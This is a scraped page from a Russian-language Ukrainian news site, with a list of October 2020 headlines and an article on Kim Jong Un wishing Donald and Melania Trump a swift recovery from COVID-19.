Лукашенко</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820262"> <span class="postDate">07:40</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19">Ким Чен Ын пожелал Дональду Трампу поскорее выздороветь от COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820223"> <span class="postDate">07:30</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/510-kiev-zanyal-vtoroe-mesto-v-mirovom-rejtinge-gorodov-s-samym-gryaznym-vozduxom">Киев занял второе место в мировом рейтинге городов с самым грязным воздухом</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820231"> <span class="postDate">07:25</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/510-v-rf-arestovan-eks-komandir-brigady-boevikov-dnr-chto-izvestno">В РФ арестован экс-командир бригады боевиков «ДНР»: что известно</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820241"> <span class="postDate">07:08</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/510-ot-koronavirusa-umer-vsemirno-izvestnyj-dizajner">От коронавируса умер всемирно известный дизайнер</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820238"> <span class="postDate">06:49</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/510-indiya-ispytala-giperzvukovuyu-ballisticheskuyu-raketu-video">Индия испытала гиперзвуковую баллистическую ракету (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820235"> <span class="postDate">06:28</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/510-minsk-vnezapno-ushel-pod-vodu-video">Водный коллапс в Минске: город внезапно ушел под воду (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820232"> <span class="postDate">06:02</span> <a class="postTitle" href="https://enovosty.com/news_society/full/510-prognoz-pogody-v-ukraine-na-5-oktyabrya">Прогноз погоды в Украине на 5 октября (КАРТА)</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>04.10.2020 г.</span><br /><div class="post_news"> <span id="post-4820228"> <span class="postDate">23:15</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/410-foto-dnya-v-minske-proshel-mnogotysyachnyj-marsh-osvobozhdeniya-foto">"Пошел вон - ты и твой ОМОН": в Минске прошел многотысячный "Марш освобождения" (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820214"> <span class="postDate">20:35</span> <a class="postTitle" href="https://enovosty.com/news_society/full/410-premer-ministr-denis-shmygal-predupredil-ukraincev-ob-otmene-pensij">Премьер-министр Денис Шмыгаль предупредил украинцев об отмене пенсий</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820159"> <span class="postDate">20:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/410-armiya-ssha-vypustila-pervyj-vertolet-uh-60v-so-steklyannoj-kabinoj">Армия США выпустила первый вертолет UH-60V со "стеклянной" кабиной</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820163"> <span class="postDate">17:40</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/410-yaponskie-voennye-prinyali-na-vooruzhenie-pervyj-sovremennyj-samolet-razvedchik">Японские военные приняли на вооружение первый современный самолет-разведчик</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820210"> <span class="postDate">17:21</span> <a class="postTitle" href="https://enovosty.com/news_society/full/410-texnika-ne-vyderzhala-v-minske-slomalsya-vodomet-i-nachal-polivat-vodoj-sherengi-omon-video">Техника не выдержала: в Минске сломался водомет и начал поливать водой шеренги ОМОН (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820192"> <span class="postDate">15:00</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/410-uchenye-opredelili-opasnejshuyu-mutaciyu-koronavirusa">Ученые определили опаснейшую мутацию коронавируса</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820190"> <span class="postDate">14:30</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/410-samyj-trogatelnyj-post-kejt-middlton-vmeste-s-suprugom-poobshhalis-s-avstralijskimi-spasatelyami-video">Самый трогательный пост: Кейт Миддлтон вместе с супругом пообщались с австралийскими спасателями (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820187"> <span class="postDate">14:28</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/410-rossiya-skryvala-ekologicheskuyu-katastrofu-i-razliv-nefti-v-tixom-okeane">Россия скрывала экологическую катастрофу и разлив нефти в Тихом океане</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820188"> <span class="postDate">14:00</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/410-stalo-izvestno-skolko-ukrainskix-uchitelej-i-shkolnikov-zaboleli-covid-19-video">Стало известно, сколько украинских учителей и школьников заболели COVID-19 (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820178"> <span class="postDate">13:15</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/410-v-ssha-proveli-ispytaniya-bpla-reaper-s-rekordnym-kolichestvom-raket">В США провели испытания БПЛА Reaper с рекордным количеством ракет</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820160"> <span class="postDate">11:45</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/410-vo-francii-iz-za-prolivnyx-dozhdej-ruxnul-most-video">Во Франции из-за проливных дождей рухнул мост (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820128"> <span class="postDate">11:30</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/410-nazvany-novye-nyuansy-covid-19-u-detej-kakie-mogut-byt-simptomy">Названы новые нюансы COVID-19 у детей: какие могут быть симптомы</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820180"> <span class="postDate">11:25</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/410-smertelnoe-dtp-v-kieve-marshrutka-sbila-trex-peshexodov-foto">Смертельное ДТП в Киеве: маршрутка сбила трех пешеходов (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820158"> <span class="postDate">11:09</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/410-v-kremle-nazvali-usloviya-dlya-otpravki-v-karabax-rossijskix-mirotvorcev">В Кремле назвали условия для отправки в Карабах российских миротворцев</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820126"> <span class="postDate">11:00</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/410-top-5-samyx-vostrebovannyx-professij-na-rynke-truda">ТОП-5 самых востребованных профессий на рынке труда</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820154"> <span class="postDate">10:47</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/410-tolko-za-odin-den-privezli-60-tyazheloranenyx-vrach-gospitalya-v-armenii">"Только за один день привезли 60 тяжелораненых", - врач госпиталя в Армении</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820124"> <span class="postDate">10:30</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/410-v-germanii-predstavili-prototip-boevoj-mashiny-sposobnoj-razgonyatsya-do-100-km-ch-foto">В Германии представили прототип боевой машины, способной разгоняться до 100 км/ч (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820118"> <span class="postDate">10:00</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/410-na-prodazhu-vystavili-samyj-bystryj-superkar-planety-s-1990-x-foto">На продажу выставили самый быстрый суперкар планеты с 1990-х (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820116"> <span class="postDate">09:30</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/410-v-privatbanke-rsskazali-skolko-za-den-obmenyali-25-kopeechnyx-monet">В Приватбанке рассказали, сколько за день обменяли 25-копеечных монет</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820114"> <span class="postDate">09:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/410-uragan-aleks-v-italii-i-francii-est-propavshie-bez-vesti-i-pogibshie-foto">Ураган "Алекс" в Италии и Франции: есть пропавшие без вести и погибшие (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820108"> <span class="postDate">08:30</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/410-v-seti-poyavilos-video-s-kladbishha-klassicheskix-avtomobilej-chevrolet">В Сети появилось видео с "кладбища" классических автомобилей Chevrolet</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4820167"> <span class="postDate">08:00</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/410-vpervye-za-7-mesyacev-s-nachala-pandemii-v-madride-otkrylos-znamenitoe-flamenko-shou-foto">Впервые за 7 месяцев с начала пандемии в Мадриде открылось знаменитое фламенко-шоу (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post" style="margin:0; padding:0; " id="post-4820262"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/zdorove/full/510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">Ким Чен Ын пожелал Дональду Трампу поскорее выздороветь от COVID-19</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/zdorove">Здоровье</a> <span>&raquo;</span> Ким Чен Ын пожелал Дональду Трампу поскорее выздороветь от COVID-19</div><time datetime="2020-10-05T07:40:13+03:00"><span id="date">Здоровье, 07:40:13 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%9A%D0%B8%D0%BC+%D0%A7%D0%B5%D0%BD+%D0%AB%D0%BD+%D0%BF%D0%BE%D0%B6%D0%B5%D0%BB%D0%B0%D0%BB+%D0%94%D0%BE%D0%BD%D0%B0%D0%BB%D1%8C%D0%B4%D1%83+%D0%A2%D1%80%D0%B0%D0%BC%D0%BF%D1%83+%D0%BF%D0%BE%D1%81%D0%BA%D0%BE%D1%80%D0%B5%D0%B5+%D0%B2%D1%8B%D0%B7%D0%B4%D0%BE%D1%80%D0%BE%D0%B2%D0%B5%D1%82%D1%8C+%D0%BE%D1%82+COVID-19&url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%9A%D0%B8%D0%BC+%D0%A7%D0%B5%D0%BD+%D0%AB%D0%BD+%D0%BF%D0%BE%D0%B6%D0%B5%D0%BB%D0%B0%D0%BB+%D0%94%D0%BE%D0%BD%D0%B0%D0%BB%D1%8C%D0%B4%D1%83+%D0%A2%D1%80%D0%B0%D0%BC%D0%BF%D1%83+%D0%BF%D0%BE%D1%81%D0%BA%D0%BE%D1%80%D0%B5%D0%B5+%D0%B2%D1%8B%D0%B7%D0%B4%D0%BE%D1%80%D0%BE%D0%B2%D0%B5%D1%82%D1%8C+%D0%BE%D1%82+COVID-19&url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4820262" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><p><b>У Дональда Трампа и Мелании был диагностирован коронавирус рано утром в пятницу.</b></p> <div style="text-align:center;"> <div data-hyb-ssp-in-image-overlay="5ef49f174d506eacc0504d73"><img width="460" height="285" src="https://enovosty.com/wp-content/uploads/2020/10/755512709388191-460x285.jpeg" class="attachment-news-image size-news-image wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2020/10/755512709388191-460x285.jpeg 460w, https://enovosty.com/wp-content/uploads/2020/10/755512709388191-112x69.jpeg 112w, https://enovosty.com/wp-content/uploads/2020/10/755512709388191-300x186.jpeg 300w, https://enovosty.com/wp-content/uploads/2020/10/755512709388191-768x475.jpeg 768w, https://enovosty.com/wp-content/uploads/2020/10/755512709388191-640x396.jpeg 640w, https://enovosty.com/wp-content/uploads/2020/10/755512709388191-e1601882018804.jpeg 480w" sizes="(max-width: 460px) 100vw, 460px" /></div></div> <p>Лидер Северной Кореи Ким Чен Ын выразил свои соболезнования президенту Дональду <a class="tag" href="https://enovosty.com/tag/tramp" target="_blank">Трамп</a>у и первой леди Мелании Трамп после того, как у них оказался положительный результат на <a class="tag" href="https://enovosty.com/tag/koronavirus" target="_blank">коронавирус</a>, сообщает государственное пропагандистское агентство режима.</p><p>«Я выражаю соболезнования вам и вашей семье», &#8212; заявил Ким в своем послании, сообщает северокорейское пропагандистское агентство KCNA. «Я искренне желаю вам и первой леди скорейшего выздоровления».</p><p>«Вы пройдете через это», &#8212; добавил Ким.</p><p>Напомним, Трамп посетил два саммита с Кимом в Сингапуре и Вьетнаме и стал первым действующим президентом США, пересекшим границу Северной Кореи. Они также обменивались письмами взаимной признательности и яростными угрозами на протяжении всего срока пребывания Трампа в должности.</p><p>Несмотря на общение двух лидеров, США еще не предприняли никаких шагов для предотвращения производства ядерного материала Северной Кореей. Не было достигнуто никаких официальных соглашений, прямо запрещающих Северной Корее испытывать ядерное оружие или баллистические ракеты большой дальности.</p><p>Сообщение Кима поступило через несколько часов после того, как у Дональда и Мелании был диагностирован коронавирус рано утром в пятницу (по местному времени).</p><p>Трамп был доставлен в Медицинский центр имени Уолтера Рида в Мэриленде в пятницу днем.</p><p>«Из-за большой осторожности и по рекомендации своего врача и медицинских экспертов президент будет работать из президентского офиса в Медицинском центре в течение следующих нескольких дней», &#8212; говорится в заявлении Белого дома.</p><p>В Белом доме добавили, что он не в тяжелом состоянии. Глава администрации Белого дома Марк Медоуз сказал, что Трамп испытывает «легкие симптомы» <a class="tag" href="https://enovosty.com/tag/covid-19" target="_blank">COVID-19</a>.</p><p>Трамп записал <a rel="nofollow" href="https://twitter.com/realDonaldTrump/status/1312158400352972800?s=20" data-analytics-module="body_link" data-analytics-post-depth="80">видео</a> в Белом доме перед поездкой в Медицинский центр, поблагодарив «всех за огромную поддержку».</p><blockquote class="twitter-tweet"><p dir="ltr" lang="und"><a rel="nofollow" href="https://t.co/B4H105KVSs">pic.twitter.com/B4H105KVSs</a></p><p>— Donald J. Trump (@realDonaldTrump) <a rel="nofollow" href="https://twitter.com/realDonaldTrump/status/1312158400352972800?ref_src=twsrc%5Etfw">October 2, 2020</a></p></blockquote><p><script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p><p>«Я думаю, что у меня все будет хорошо, но мы собираемся убедиться, что все наладится», &#8212; сказал Трамп в видео. «У первой леди все хорошо».</p><p><em>Источник: <a rel="nofollow" href="https://www.businessinsider.com/north-korea-warm-condolence-trump-coronavirus-2020-10">Businessinsider</a></em></p><div class="tptn_counter" style="color:white;" id="tptn_counter_4820262"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4820262&amp;_wpnonce=2259b3c507"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"/> <meta itemprop="width" content="512"> <meta itemprop="height" content="512"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Экономические новости" /></span><meta itemprop="datePublished" content="2020-10-05T07:40:13+03:00"/><meta itemprop="dateModified" content="2020-10-05T15:40:37+03:00"/><meta itemprop="genre" content="Здоровье"/><meta itemprop="description" content="У Дональда Трампа и Мелании был диагностирован коронавирус рано утром в пятницу."/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2020/10/755512709388191-460x285.jpeg"><span itemprop="image" content="https://enovosty.com/wp-content/uploads/2020/10/755512709388191-460x285.jpeg"><meta itemprop="width" content="460"><meta itemprop="height" content="285"> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/youtube.jpg"></a><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/covid-19" rel="tag">COVID-19</a>, <a href="https://enovosty.com/tag/koronavirus" rel="tag">коронавирус</a>, <a href="https://enovosty.com/tag/tramp" rel="tag">Трамп</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 8</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%9A%D0%B8%D0%BC+%D0%A7%D0%B5%D0%BD+%D0%AB%D0%BD+%D0%BF%D0%BE%D0%B6%D0%B5%D0%BB%D0%B0%D0%BB+%D0%94%D0%BE%D0%BD%D0%B0%D0%BB%D1%8C%D0%B4%D1%83+%D0%A2%D1%80%D0%B0%D0%BC%D0%BF%D1%83+%D0%BF%D0%BE%D1%81%D0%BA%D0%BE%D1%80%D0%B5%D0%B5+%D0%B2%D1%8B%D0%B7%D0%B4%D0%BE%D1%80%D0%BE%D0%B2%D0%B5%D1%82%D1%8C+%D0%BE%D1%82+COVID-19&url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%9A%D0%B8%D0%BC+%D0%A7%D0%B5%D0%BD+%D0%AB%D0%BD+%D0%BF%D0%BE%D0%B6%D0%B5%D0%BB%D0%B0%D0%BB+%D0%94%D0%BE%D0%BD%D0%B0%D0%BB%D1%8C%D0%B4%D1%83+%D0%A2%D1%80%D0%B0%D0%BC%D0%BF%D1%83+%D0%BF%D0%BE%D1%81%D0%BA%D0%BE%D1%80%D0%B5%D0%B5+%D0%B2%D1%8B%D0%B7%D0%B4%D0%BE%D1%80%D0%BE%D0%B2%D0%B5%D1%82%D1%8C+%D0%BE%D1%82+COVID-19&url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4820262" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="ae00d6052e" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div><br><div id='admixer_f1971219dfb645c1a3626879325bc045_zone_45971_sect_1082_site_1069' data-sender='admixer'></div><script type='text/javascript'>(window.globalAmlAds = window.globalAmlAds || []).push(function() {globalAml.display('admixer_f1971219dfb645c1a3626879325bc045_zone_45971_sect_1082_site_1069');});</script> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/en_analitics.jpg" style="margin-right: 5px;margin-bottom: -2px;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4820074"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/310-novyj-karabaxskij-vzryv-otkuda-eto-poshlo-i-komu-eto-vygodno">Новый Карабахский взрыв: кому это выгодно, причины и последствия</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4819713"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/finance/full/3009-bankovskaya-tajna-kto-budet-imet-dostup-k-schetam-ukraincev">Банковская тайна: кто будет иметь доступ к счетам украинцев</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4819784"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/3009-itogi-sentyabrya-koronavirusnaya-strategiya-mira-predchuvstvie-bolshoj-vojny-i-tuchi-nad-amerikoj">Итоги сентября: Коронавирусная стратегия мира, предчувствие большой войны и тучи над Америкой</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4819435"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/2809-bezvizoviy-rezhim-ukraina-es-nevesomost-chem-grozit-zhelanie-bankovoj-kontrolirovat-sap">Безвизовый режим с ЕС: чем грозит желание Банковой контролировать САП</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4819406"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 